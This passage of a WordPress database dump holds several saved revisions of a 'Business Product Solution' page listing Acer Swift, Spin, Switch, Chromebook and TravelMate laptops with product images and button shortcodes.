src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:13:35','2019-09-18 06:13:35','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3125,1,'2019-09-18 14:14:31','2019-09-18 06:14:31','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:14:31','2019-09-18 06:14:31','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3126,1,'2019-09-18 14:14:54','2019-09-18 06:14:54','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:14:54','2019-09-18 06:14:54','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3127,1,'2019-09-18 14:16:19','2019-09-18 06:16:19','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:16:19','2019-09-18 06:16:19','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3128,1,'2019-09-18 14:18:17','2019-09-18 06:18:17','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" 